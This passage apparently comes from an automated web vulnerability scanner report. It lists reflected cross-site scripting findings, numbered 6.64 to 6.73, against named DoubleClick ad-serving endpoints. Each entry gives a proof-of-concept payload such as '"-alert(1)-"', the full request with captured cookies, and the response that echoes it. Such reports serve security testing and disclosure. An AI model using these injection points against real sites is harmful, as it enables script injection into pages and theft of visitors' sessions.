<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
engreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=110781&pubICode=1662910&pub=256078edfc6"-alert(1)-"fc5c4421cff&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=h
...[SNIP]...

6.64. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [pubICode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.689

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17651"-alert(1)-"3f123fd8fd4 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.689;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B7c94f55964792487%3B12fb0bfb735,0%3B%3B%3B3844682965,yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANbe.sC8BAAAAAAAAADUzMzgzZGRhLTc0YmEtMTFlMC1hZWVlLTAwMzA0OGQ2NjcwYQA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=110781&pubICode=166291017651"-alert(1)-"3f123fd8fd4&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340444? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZpFaMW4wHCuapU-3-UoDVogtDa4lbtPVBOxzhAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D1538472195%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,53383dda-74ba-11e0-aeee-003048d6670a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:54:06 GMT
Content-Length: 9308

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=110781&pubICode=166291017651"-alert(1)-"3f123fd8fd4&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&re
...[SNIP]...

6.65. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.689

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 383aa"-alert(1)-"6682829cf01 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.689;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B7c94f55964792487%3B12fb0bfb735,0%3B%3B%3B3844682965,yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANbe.sC8BAAAAAAAAADUzMzgzZGRhLTc0YmEtMTFlMC1hZWVlLTAwMzA0OGQ2NjcwYQA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781383aa"-alert(1)-"6682829cf01&campID=80340&crID=110781&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340444? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZpFaMW4wHCuapU-3-UoDVogtDa4lbtPVBOxzhAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D1538472195%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,53383dda-74ba-11e0-aeee-003048d6670a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:53:36 GMT
Content-Length: 9308

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781383aa"-alert(1)-"6682829cf01&campID=80340&crID=110781&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2
...[SNIP]...

6.66. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.689

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e1fc"-alert(1)-"fb131e4ea40 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.689;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B7c94f55964792487%3B12fb0bfb735,0%3B%3B%3B3844682965,yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAANbe.sC8BAAAAAAAAADUzMzgzZGRhLTc0YmEtMTFlMC1hZWVlLTAwMzA0OGQ2NjcwYQA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340444814544-110781&campID=80340&crID=110781&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml5e1fc"-alert(1)-"fb131e4ea40&redirectURL=;ord=1304340444? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADp8ooAAAAAAN8.IwAAAAAAAgAMAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZpFaMW4wHCuapU-3-UoDVogtDa4lbtPVBOxzhAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D1538472195%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,53383dda-74ba-11e0-aeee-003048d6670a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:54:35 GMT
Content-Length: 9308

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml5e1fc"-alert(1)-"fb131e4ea40&redirectURL=https%3a%2f%2fwww.thinkorswim.com/tos/suiteFreedom/Thrilloftrade.tos%3Fo%3D2%26a%3DIVN%26%26cid%3DGENRET%3B877237%3B62579861%3B239944998%3B39989395");
var fscUrl = url;
var fscUrlClickTa
...[SNIP]...

6.67. http://ad.doubleclick.net/adj/mcn.skynews.com.au/topstories [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mcn.skynews.com.au/topstories

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e433a'%3balert(1)//574f9c7b613 was submitted in the tile parameter. This input was echoed as e433a';alert(1)//574f9c7b613 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/mcn.skynews.com.au/topstories;tile=e433a'%3balert(1)//574f9c7b613 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.skynews.com.au/topstories/article.aspx?id=607751
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 281
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 12:51:24 GMT
Expires: Mon, 02 May 2011 12:51:24 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3afb/0/0/%2a/p;44306;0-0;0;38332742;31-1/1;0/0/0;;~okv=;tile=e433a';alert(1)//574f9c7b613;~sscs=%3f"><img src="http://s0.2
...[SNIP]...

6.68. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.68327.9418.302br.net
Path:   /jsi/adi/N5047.Turn/B5053148.22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ec5c"-alert(1)-"d8956f93e59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsi/adi4ec5c"-alert(1)-"d8956f93e59/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/; HTTP/1.1
Host: ad.doubleclick.net.68327.9418.302br.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:21 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=44CBE5C1CD4C81E2545A0132A5269940; Path=/
Content-Length: 8066
Connection: keep-alive

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=",
   adsafeSrc : "http://ad.doubleclick.net.68327.9418.302br.net/fw/adi4ec5c"-alert(1)-"d8956f93e59/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


(f
...[SNIP]...

6.69. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.68327.9418.302br.net
Path:   /jsi/adi/N5047.Turn/B5053148.22

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b30c"-alert(1)-"9695098fb11 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsi/adi/N5047.Turn8b30c"-alert(1)-"9695098fb11/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/; HTTP/1.1
Host: ad.doubleclick.net.68327.9418.302br.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:22 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5D4080B28D22805506B720B2933FF347; Path=/
Content-Length: 8066
Connection: keep-alive

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=",
   adsafeSrc : "http://ad.doubleclick.net.68327.9418.302br.net/fw/adi/N5047.Turn8b30c"-alert(1)-"9695098fb11/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


(function(){v
...[SNIP]...

6.70. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.68327.9418.302br.net
Path:   /jsi/adi/N5047.Turn/B5053148.22

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9017c"-alert(1)-"80544c6b860 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsi/adi/N5047.Turn/B5053148.229017c"-alert(1)-"80544c6b860;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/; HTTP/1.1
Host: ad.doubleclick.net.68327.9418.302br.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:23 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8C10D282C941C7DE63320B1BED106369; Path=/
Content-Length: 8066
Connection: keep-alive

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=",
   adsafeSrc : "http://ad.doubleclick.net.68327.9418.302br.net/fw/adi/N5047.Turn/B5053148.229017c"-alert(1)-"80544c6b860;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


(function(){var f="3.6";v
...[SNIP]...

6.71. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.68327.9418.302br.net
Path:   /jsi/adi/N5047.Turn/B5053148.22

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34676"-alert(1)-"f580a372d7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsi/adi/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;&34676"-alert(1)-"f580a372d7e=1 HTTP/1.1
Host: ad.doubleclick.net.68327.9418.302br.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:19 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EDC7A16E161345630CC062C2A7C3EE22; Path=/
Content-Length: 8069
Connection: keep-alive

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=",
   adsafeSrc : "http://ad.doubleclick.net.68327.9418.302br.net/fw/adi/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;&34676"-alert(1)-"f580a372d7e=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=functi
...[SNIP]...

6.72. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.68327.9418.302br.net
Path:   /jsi/adi/N5047.Turn/B5053148.22

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 333cb"-alert(1)-"eeb14d1dc7a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsi/adi/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;333cb"-alert(1)-"eeb14d1dc7a HTTP/1.1
Host: ad.doubleclick.net.68327.9418.302br.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:19 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=17BAEFDF7BE018231805D90804D77DC4; Path=/
Content-Length: 8066
Connection: keep-alive

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=200&cb=8222841&referrer=",
   adsafeSrc : "http://ad.doubleclick.net.68327.9418.302br.net/fw/adi/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;333cb"-alert(1)-"eeb14d1dc7a",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function
...[SNIP]...

6.73. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.76705.9611.302br.net
Path:   /jss/adj/N1243.Glam.com/B5234896.7

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70c35"-alert(1)-"57f7527f91 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jss/adj70c35"-alert(1)-"57f7527f91/N1243.Glam.com/B5234896.7;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0395-_urlenc%3D1-_gclickid%3Dgaclk4dbeab8c82a2c-_advid%3D1496576-_adid%3D5000037476-_crid%3D500025060-_aipid%3D201105020550-_ge_%3D1%5E2%5E74c8329596917677db0f6729cea21950-ord%3D7355434447526932-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1qn3h5or%2Cf0f12sa%2Cg10001s-_gclick_gaclk4dbeab8c82a2c;ord=4dbeab8c812bf? HTTP/1.1
Host: ad.doubleclick.net.76705.9611.302br.net
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Mon, 02 May 2011 13:09:43 GMT
